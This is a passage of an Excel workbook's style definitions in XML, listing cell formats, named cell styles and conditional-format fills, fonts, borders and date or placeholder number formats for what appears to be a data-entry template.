    <xf numFmtId="0" fontId="0" fillId="0" borderId="7" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="7" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="7" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="9" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="168" fontId="8" fillId="0" borderId="0" xfId="45" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="168" fontId="10" fillId="0" borderId="0" xfId="45" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="169" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="23" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="168" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="168" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFill="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="4" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="0" xfId="0" applyFill="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="5" borderId="24" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="5" borderId="26" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="5" borderId="28" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="25" xfId="0" applyFont="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="27" xfId="0" applyFont="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="29" xfId="0" applyFont="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="168" fontId="14" fillId="7" borderId="30" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="168" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="14" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="168" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="168" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="169" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFill="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
  </cellXfs>
  <cellStyles count="47">
    <cellStyle name="Bad" xfId="1" builtinId="27"/>
    <cellStyle name="Comma 2" xfId="46" xr:uid="{77E0E160-D920-4DED-AFDE-C5F76D87BDFE}"/>
    <cellStyle name="Followed Hyperlink" xfId="27" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="43" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="25" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="13" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="39" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="33" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="29" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="41" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="35" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="31" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="3" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="7" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="15" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="21" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="11" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="37" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="9" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="19" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="23" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="17" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="5" builtinId="9" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="42" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="36" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="24" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="14" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="18" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="34" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="40" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="8" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="38" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="12" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="10" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="26" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="30" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="16" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="6" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="20" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="4" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="28" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="32" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="22" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="2" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="44" builtinId="8"/>
    <cellStyle name="Normal" xfId="0" builtinId="0" customBuiltin="1"/>
    <cellStyle name="Normal 2" xfId="45" xr:uid="{440F589B-5446-488C-A253-982E14DE5CF6}"/>
  </cellStyles>
  <dxfs count="277">
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFE0E0E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3" formatCode="m/d/yyyy"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="173" formatCode="m/d/yyyy"/>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border>
        <top style="medium">
          <color rgb="FF393939"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color theme="0"/>
        <name val="IBM Plex Sans"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>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style="medium">
          <color rgb="FF393939"/>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numFmt numFmtId="168" formatCode="yyyy\-mm\-dd;@"/>
      <alignment horizontal="left" vertical="center"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center"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rgb="FF000000"/>
        <name val="IBM Plex Sans"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="none">
          <fgColor indexed="64"/>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>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bottom" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <border diagonalUp="0" diagonalDown="0" outline="0">
        <left/>
        <right/>
        <top/>
        <bottom style="medium">
          <color rgb="FF393939"/>
        </bottom>
      </border>
      <protection locked="1" hidden="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <name val="IBM Plex Sans"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="168" formatCode="yyyy\-mm\-dd;@"/>
      <fill>
        <patternFill patternType="none">
          <fgColor indexed="64"/>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>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bottom" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <border diagonalUp="0" diagonalDown="0" outline="0">
        <left/>
        <right/>
        <top/>
        <bottom style="medium">
          <color rgb="FF393939"/>
        </bottom>
      </border>
      <protection locked="1" hidden="0"/>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color rgb="FF393939"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color theme="0"/>
        <name val="IBM Plex Sans"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill>
          <fgColor indexed="64"/>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>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i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color theme="0"/>
        <name val="IBM Plex Sans"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor theme="4"/>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="center" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <border diagonalUp="0" diagonalDown="0" outline="0">
        <left style="thin">
          <color auto="1"/>
        </left>
        <right style="thin">
          <color auto="1"/>
        </right>
        <top/>
        <bottom/>
      </border>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FF24A148"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFF1C21B"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF832B"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <name val="IBM Plex Sans"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>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center" textRotation="0" wrapText="0" indent="1" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <border diagonalUp="0" diagonalDown="0" outline="0">
        <left/>
        <right style="medium">
          <color rgb="FF393939"/>
        </right>
        <top style="medium">
          <color rgb="FF393939"/>
        </top>
        <bottom style="medium">
          <color rgb="FF393939"/>
        </bottom>
      </border>
      <protection locked="1" hidden="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color auto="1"/>
        <name val="IBM Plex Sans"/>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general" vertical="bottom" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>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auto="1"/>
        <name val="IBM Plex Sans"/>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bottom style="medium">
          <color rgb="FF393939"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color auto="1"/>
        <name val="IBM Plex Sans"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="168" formatCode="yyyy\-mm\-dd;@"/>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0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <border diagonalUp="0" diagonalDown="0" outline="0">
        <left style="medium">
          <color rgb="FF393939"/>
        </left>
        <right/>
        <top/>
        <bottom style="medium">
          <color rgb="FF393939"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color rgb="FF393939"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color theme="0"/>
        <name val="IBM Plex Sans"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill>
          <fgColor indexed="64"/>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <name val="IBM Plex Sans"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <name val="IBM Plex Sans"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>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ill>
        <patternFill>
          <fgColor rgb="FF000000"/>
          <bgColor rgb="FF393939"/>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ont>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color theme="0"/>
        <name val="IBM Plex Sans"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill>
          <fgColor indexed="64"/>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FF00B050"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFC000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>
      <border diagonalUp="0" diagonalDown="0" outline="0">
        <left/>
        <right style="medium">
          <color rgb="FF393939"/>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ill>
        <patternFill>
          <fgColor indexed="64"/>
          <bgColor rgb="FF393939"/>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style="medium">
          <color rgb="FF393939"/>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ont>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color theme="0"/>
        <name val="IBM Plex Sans"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>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9" formatCode="yyyy\-mm\-dd\ hh:mm:ss"/>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ont>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color theme="0"/>
        <name val="IBM Plex Sans"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <numFmt numFmtId="170" formatCode="&quot;Enter Valuer Here&quot;"/>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>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strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color rgb="FF0062FF"/>
        <name val="IBM Plex San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strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color rgb="FF0062FF"/>
        <name val="IBM Plex Sans"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="0" formatCode="Genera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ont>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <fgColor indexed="64"/>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF9C0006"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFC7CE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
      <border>
        <left style="thin">
          <color rgb="FFDA1E28"/>
        </left>
        <right style="thin">
          <color rgb="FFDA1E28"/>
        </right>
        <top style="thin">
          <color rgb="FFDA1E28"/>
        </top>
        <bottom style="thin">
          <color rgb="FFDA1E28"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF9C0006"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFC7CE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF006100"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFC6EFCE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FF24A148"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <color rgb="FF000000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFF1C21B"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF000000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF832B"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <numFmt numFmtId="171" formatCode="&quot;Enter Value Here&quot;"/>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>
      <border diagonalUp="0" diagonalDown="0" outline="0">
        <left/>
        <right style="medium">
          <color rgb="FF393939"/>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rgb="FF000000"/>
        <name val="IBM Plex Sans"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color rgb="FF00000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strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color rgb="FF0062FF"/>
        <name val="IBM Plex Sans"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="0" formatCode="General"/>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ill>
        <patternFill>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF9C0006"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFC7CE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF832B"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFF1C21B"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FF24A148"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF832B"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FF24A148"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFF1C21B"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
      <border>
        <vertical/>
        <horizontal/>
      </border>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <numFmt numFmtId="172" formatCode="&quot;Please Enter A Valid Member&quot;"/>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
      <border>
        <vertical/>
        <horizontal/>
      </border>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
      <border>
        <left style="thin">
          <color rgb="FFDA1E28"/>
        </left>
        <right style="thin">
          <color rgb="FFDA1E28"/>
        </right>
        <top style="thin">
          <color rgb="FFDA1E28"/>
        </top>
        <bottom style="thin">
          <color rgb="FFDA1E28"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>
      <border diagonalUp="0" diagonalDown="0" outline="0">
        <left/>
        <right style="medium">
